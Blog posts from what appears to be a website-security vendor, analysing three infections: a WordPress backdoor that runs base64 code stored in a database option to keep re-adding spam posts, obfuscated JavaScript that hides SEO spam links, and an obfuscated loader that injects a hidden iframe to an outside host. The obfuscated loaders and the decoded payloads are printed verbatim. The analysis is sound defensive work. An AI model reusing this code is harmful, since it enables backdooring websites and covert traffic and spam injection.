Showing posts with label spam. Show all posts
Showing posts with label spam. Show all posts

Wednesday, May 27, 2015

Identifying and Removing Spam From Word Press Database

Background

This case of Spam clean-up from Word Press website didn't stand out from the first glance. Customer was blacklisted by Google due to spam posts. As a part of blacklisting removal service we reviewed Google alert and start working. Internal malware scan with Quttera tools quickly identified and verified the infection and type. However, the Spam posts kept re-appearing upon successful clean-ups. This post is a short overview of Spam removal process to give you hints when you search for Spam origin in your websites.

Malware Scan and Investigation

As no suspicious posts were there in Word Press dashboard we started to investigate MySQL database tables content. Spamming posts were found and removed from database. In no time, new posts were added with different spam content. Next thing we checked cache plugins that were installed and removed them to decrease "investigation noise". After that, we dumped content of wpoptions table and investigated its content. During investigation we found two malicious Word Press options  wpdcon and wptheme_opt. 

wpdcon contained suspicious IP masks encoded with base64  

NS4yNTUuMTkyLjAtMTg= 
OC4qLiouKg==
MTIuMC4qLio= 

For full body see here - http://pastebin.com/uYzXu1B3

These masks are used to recognize whether request came from human visitor 

wptheme_opt  (http://pastebin.com/cdFLyL9X ) contained actually the body that loaded spam posts into the data base.

When were removed, the missing options started to generate errors upon access to a website. Investigating those errors highlighted the exact injection place.

Following is a dump of the infection:

{{{{

add_action('init', create_function('', implode("\n", array_map("base64_decode", unserialize(get_option("wptheme_opt"))))));

}}}}

Resolution

As a part of anti-malware services for websites, the re-consideration request has been submitted and Google have removed their alert. 


Thursday, October 3, 2013

JavaScript Injecting Invisible Spam

Malicious obfuscated JavaScript detected on scanned website injects spam invisible to site visitor



Background

Online Website Malware Scanner reported malicious JavaScript code in scanned web pages. Such malicious obfuscated JavaScript code is often used to inject malicious iframe(s) invisibly to website visitor and to download malware from remote distributor onto visitor's computer.

However, in this case it modifies the property of the html paragraph tag so that to hide its content from the eyes of the visitor while it remains visible for robots. This is likely the BlackHat SEO spam technique as per content and links nature. It can be assumed that this would work for drive-by-download and other malware attacks as well.

You can review BlackHat SEO example and spam SEO techniques using other method (hidden iframes) analysis in earlier posts.

Malicious action

Modifying HTML tags to make content invisible for website visitor is often used for spamming purposes and/or to distribute malware hosted on external web resources(websites).

Malware entry details

Beautified script:
  1. var rio833 = ["116", "127", "115", "133", "125", "117", "126", "132", "62", "119", "117", "132", "85", "124","117", "125", "117", "126", "132", "82", "137", "89", "116", "56", "50", "124", "125", "117", "126", "133", "66","64", "70", "50", "57", "62", "131", "132", "137", "124", "117", "62", "128", "127", "131", "121", "132", "121","127", "126", "48", "77", "48", "50", "113", "114", "131", "127", "124", "133", "132", "117", "50", "75", "116","127", "115", "133", "125", "117", "126", "132", "62", "119", "117", "132", "85", "124", "117", "125", "117","126", "132", "82", "137", "89", "116", "56", "50", "124", "125", "117", "126", "133", "66", "64", "70", "50","57", "62", "131", "132", "137", "124", "117", "62", "124", "117", "118", "132", "48", "77", "48", "61", "65","69", "64", "64", "75", "116", "127", "115", "133", "125", "117", "126", "132", "62", "119", "117", "132", "85","124", "117", "125", "117", "126", "132", "82", "137", "89", "116", "56", "50", "124", "125", "117", "126", "133","66", "64", "70", "50", "57", "62", "131", "132", "137", "124", "117", "62", "116", "121", "131", "128", "124","113", "137", "48", "77", "48", "50", "126", "127", "126", "117", "50", "75"];
  2. var kwv93 = "";
  3. var ecso014 = "";
  4. for (up420 = 0; up420 < rio833.length; up420++) {
  5.     ecso014 = rio833[up420] - 16;
  6.     kwv93 = kwv93 + String.fromCharCode(ecso014);
  7. }
  8. eval(kwv93);


Malicious payload


Decoded payload changes id="lmenu206" paragraph tag setting its display style to "none" and absolute left position to the very big value.
  1. document.getElementById("lmenu206").style.position = "absolute";
  2. document.getElementById("lmenu206").style.left = -1500;
  3. document.getElementById("lmenu206").style.display = "none";

Here is the actual content of this paragraph:
<p id="lmenu206"> Erol B眉y眉kbur莽 Kizilciklar oldu mu, <a href="http://bagdownlo1e.blogspot.com">Kizilciklar oldu mu</a>, Leman Ak莽atepe Kizilciklar oldu mu. Mahmoud El-Meliguy Hekayat hub, <a href="http://downloadc6n.blogspot.com/2009/08/movie-hekayat-hub.html">movie Hekayat hub</a>, Download A Love Story. Michelle Lynette Bush Gypsies, <a href="http://chiyarimo4e.blogspot.com/2009/08/movie-gypsies-tramps-thieves-2006.html">Download Gypsies</a>, Carla R. Ponzio Gypsies. ? <a href="http://best8biographie9.blogspot.com/2009/02/discovering-donald-ross-architect-and.html">Donald Ross: The Architect</a> <a href="http://biographi1info.blogspot.com/2009/02/inside-helmet-hard-knocks.html">Biography/Autobiography Inside the Helmet: Hard Knocks</a> Biography/Autobiography Mario, <a href="http://web3booksbio.blogspot.com/2009/02/mario-lemieux-best-there-ever-was.html">Lemieux: Best There Ever Was</a> , Sociology Masters Pr. </p>

Checked all domains referenced in this paragraph (see in bold above) on Google Safe Browsing and they were never listed as suspicious. All URLs are clean on VirusTotal as well.

When tried to access those URLs the Blogger says that there is nothing there. This technique to promote spam and other suspicious content is is widely used to infect WordPress based websites.

Malware clean-up

Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.

Monday, April 29, 2013

Hidden iframes serving blackhat SEO business

Hidden iframes still popular blackhat SEO technique to drive "unique visitors"

Another victim of malicious hidden iframe injection was detected today with Online Website Malware Scanner. The compromised company's website not only offers IT security services but it shared its traffic with website related to completely another industry(Thailand website with pharma products).

This particular case, as other similar attacks, is likely to be a part of paid "iframe-traffic shop" blackhat SEO services. Customer buys visitors to his website to improve search engine ranking. The .php file linked in the iframe appears doing nothing and contained "OK" string only (at the time this article was written). The name clk.php is obviously a click-counter method to build the reports and present the "customers". Decoded payload injects the hidden iframe once in 24 hours period to generate "unique visitors" traffic. 

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Website malware scanner report

Submission date: Mon Apr 29 06:44:07 2013
Infected website's files: 10
Website malware scan report link: http://goo.gl/bJLgU


Quttera | Online Website Malware Scanner
Quttera | Online Website Malware Scanner



Malicious JavaScript detection dump
Malicious JavaScript detection dump



Malware entry


Malware entry details.

Beautified script




  1. ss = eval("Str" + "ing");
  2. d = document;
  3. a ="68,77,70,65,76,6b,71,70,22,7c,7c,7c,68,68,68,2a,2b,22,7d,f,c,22,22,22,22,78,63,74,22,69,79,74,67,22,3f,22,66,71,65,77,6f,67,70,76,30,65,74,67,63,76,67,47,6e,67,6f,67,70,76,2a,29,6b,68,74,63,6f,67,29,2b,3d,f,c,f,c,22,22,22,22,69,79,74,67,30,75,74,65,22,3f,22,29,6a,76,76,72,3c,31,31,68,71,74,6f,71,74,67,6e,6b,68,67,30,70,67,76,31,6b,70,78,67,70,76,31,65,6e,6d,30,72,6a,72,29,3d,f,c,22,22,22,22,69,79,74,67,30,75,76,7b,6e,67,30,72,71,75,6b,76,6b,71,70,22,3f,22,29,63,64,75,71,6e,77,76,67,29,3d,f,c,22,22,22,22,69,79,74,67,30,75,76,7b,6e,67,30,64,71,74,66,67,74,22,3f,22,29,32,29,3d,f,c,22,22,22,22,69,79,74,67,30,75,76,7b,6e,67,30,6a,67,6b,69,6a,76,22,3f,22,29,33,72,7a,29,3d,f,c,22,22,22,22,69,79,74,67,30,75,76,7b,6e,67,30,79,6b,66,76,6a,22,3f,22,29,33,72,7a,29,3d,f,c,22,22,22,22,69,79,74,67,30,75,76,7b,6e,67,30,6e,67,68,76,22,3f,22,29,33,72,7a,29,3d,f,c,22,22,22,22,69,79,74,67,30,75,76,7b,6e,67,30,76,71,72,22,3f,22,29,33,72,7a,29,3d,f,c,f,c,22,22,22,22,6b,68,22,2a,23,66,71,65,77,6f,67,70,76,30,69,67,76,47,6e,67,6f,67,70,76,44,7b,4b,66,2a,29,69,79,74,67,29,2b,2b,22,7d,f,c,22,22,22,22,22,22,22,22,66,71,65,77,6f,67,70,76,30,79,74,6b,76,67,2a,29,3e,66,6b,78,22,6b,66,3f,5e,29,69,79,74,67,5e,29,40,3e,31,66,6b,78,40,29,2b,3d,f,c,22,22,22,22,22,22,22,22,66,71,65,77,6f,67,70,76,30,69,67,76,47,6e,67,6f,67,70,76,44,7b,4b,66,2a,29,69,79,74,67,29,2b,30,63,72,72,67,70,66,45,6a,6b,6e,66,2a,69,79,74,67,2b,3d,f,c,22,22,22,22,7f,f,c,7f,f,c,68,77,70,65,76,6b,71,70,22,55,67,76,45,71,71,6d,6b,67,2a,65,71,71,6d,6b,67,50,63,6f,67,2e,65,71,71,6d,6b,67,58,63,6e,77,67,2e,70,46,63,7b,75,2e,72,63,76,6a,2b,22,7d,f,c,22,78,63,74,22,76,71,66,63,7b,22,3f,22,70,67,79,22,46,63,76,67,2a,2b,3d,f,c,22,78,63,74,22,67,7a,72,6b,74,67,22,3f,22,70,67,79,22,46,63,76,67,2a,2b,3d,f,c,22,6b,68,22,2a,70,46,63,7b,75,3f,3f,70,77,6e,6e,22,7e,7e,22,70,46,63,7b,75,3f,3f,32,2b,22,70,46,63,7b,75,3f,33,3d,f,c,22,67,7a,72,6b,74,67,30,75,67,76,56,6b,6f,67,2a,76,71,66,63,7b,30,69,67,76,56,6b,6f,67,2a,2b,22,2d,22,35,38,32,32,32,32,32,2c,34,36,2c,70,46,63,7b,75,2b,3d,f,c,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,22,3f,22,65,71,71,6d,6b,67,50,63,6f,67,2d,24,3f,24,2d,67,75,65,63,72,67,2a,65,71,71,6d,6b,67,58,63,6e,77,67,2b,f,c,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,2d,22,24,3d,67,7a,72,6b,74,67,75,3f,24,22,2d,22,67,7a,72,6b,74,67,30,76,71,49,4f,56,55,76,74,6b,70,69,2a,2b,22,2d,22,2a,2a,72,63,76,6a,2b,22,41,22,24,3d,22,72,63,76,6a,3f,24,22,2d,22,72,63,76,6a,22,3c,22,24,24,2b,3d,f,c,7f,f,c,68,77,70,65,76,6b,71,70,22,49,67,76,45,71,71,6d,6b,67,2a,22,70,63,6f,67,22,2b,22,7d,f,c,22,78,63,74,22,75,76,63,74,76,22,3f,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,30,6b,70,66,67,7a,51,68,2a,22,70,63,6f,67,22,2d,22,24,3f,24,22,2b,3d,f,c,22,78,63,74,22,6e,67,70,22,3f,22,75,76,63,74,76,22,2d,22,70,63,6f,67,30,6e,67,70,69,76,6a,22,2d,22,33,3d,f,c,22,6b,68,22,2a,22,2a,22,23,75,76,63,74,76,22,2b,22,28,28,f,c,22,2a,22,70,63,6f,67,22,23,3f,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,30,75,77,64,75,76,74,6b,70,69,2a,22,32,2e,22,70,63,6f,67,30,6e,67,70,69,76,6a,22,2b,22,2b,22,2b,f,c,22,7d,f,c,22,74,67,76,77,74,70,22,70,77,6e,6e,3d,f,c,22,7f,f,c,22,6b,68,22,2a,22,75,76,63,74,76,22,3f,3f,22,2f,33,22,2b,22,74,67,76,77,74,70,22,70,77,6e,6e,3d,f,c,22,78,63,74,22,67,70,66,22,3f,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,30,6b,70,66,67,7a,51,68,2a,22,24,3d,24,2e,22,6e,67,70,22,2b,3d,f,c,22,6b,68,22,2a,22,67,70,66,22,3f,3f,22,2f,33,22,2b,22,67,70,66,22,3f,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,30,6e,67,70,69,76,6a,3d,f,c,22,74,67,76,77,74,70,22,77,70,67,75,65,63,72,67,2a,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,30,75,77,64,75,76,74,6b,70,69,2a,22,6e,67,70,2e,22,67,70,66,22,2b,22,2b,3d,f,c,7f,f,c,6b,68,22,2a,70,63,78,6b,69,63,76,71,74,30,65,71,71,6d,6b,67,47,70,63,64,6e,67,66,2b,f,c,7d,f,c,6b,68,2a,49,67,76,45,71,71,6d,6b,67,2a,29,78,6b,75,6b,76,67,66,61,77,73,29,2b,3f,3f,37,37,2b,7d,7f,67,6e,75,67,7d,55,67,76,45,71,71,6d,6b,67,2a,29,78,6b,75,6b,76,67,66,61,77,73,29,2e,22,29,37,37,29,2e,22,29,33,29,2e,22,29,31,29,2b,3d,f,c,f,c,7c,7c,7c,68,68,68,2a,2b,3d,f,c,7f,f,c,7f".split(",");
  4. for (i = 0; i < a.length; i++) {
  5.     a[i] = parseInt(a[i], 16) - (5 - 3);
  6. }
  7. try {
  8.     d.body--
  9. } catch (q) {
  10.     zz = 0;
  11. }
  12. try {
  13.     zz &= 2
  14. } catch (q) {
  15.     zz = 1;
  16. }
  17. if (!zz) if (window.document) eval(ss.fromCharCode.apply(ss, a));


Malicious payload


Decoded payload generates hidden iframe to http://formorelife.net/invent/clk.php


  1. function zzzfff() {
  2.     var gwre = document.createElement('iframe');
  3.     gwre.src = 'http://formorelife.net/invent/clk.php';
  4.     gwre.style.position = 'absolute';
  5.     gwre.style.border = '0';
  6.     gwre.style.height = '1px';
  7.     gwre.style.width = '1px';
  8.     gwre.style.left = '1px';
  9.     gwre.style.top = '1px';
  10.     if (!document.getElementById('gwre')) {
  11.         document.write('<div id=\'gwre\'></div>');
  12.         document.getElementById('gwre').appendChild(gwre);
  13.     }
  14. }



Here the cookies are used to inject the iframe once in 24 hours period.



  1. function SetCookie(cookieName, cookieValue, nDays, path) {
  2.     var today = new Date();
  3.     var expire = new Date();
  4.     if (nDays == null || nDays == 0) nDays = 1;
  5.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  6.     document.cookie = cookieName + "=" + escape(cookieValue)
  7.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  8. }
  9. function GetCookie(name) {
  10.     var start = document.cookie.indexOf(name + "=");
  11.     var len = start + name.length + 1;
  12.     if ((!start) &&
  13.     (name != document.cookie.substring(0, name.length)))
  14.     {
  15.         return null;
  16.     }
  17.     if (start == -1) return null;
  18.     var end = document.cookie.indexOf(";", len);
  19.     if (end == -1) end = document.cookie.length;
  20.     return unescape(document.cookie.substring(len, end));
  21. }
  22. if (navigator.cookieEnabled)
  23. {
  24.     if (GetCookie('visited_uq') == 55) {} else {
  25.         SetCookie('visited_uq', '55', '1', '/');
  26.         zzzfff();
  27.     }
  28. }


Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.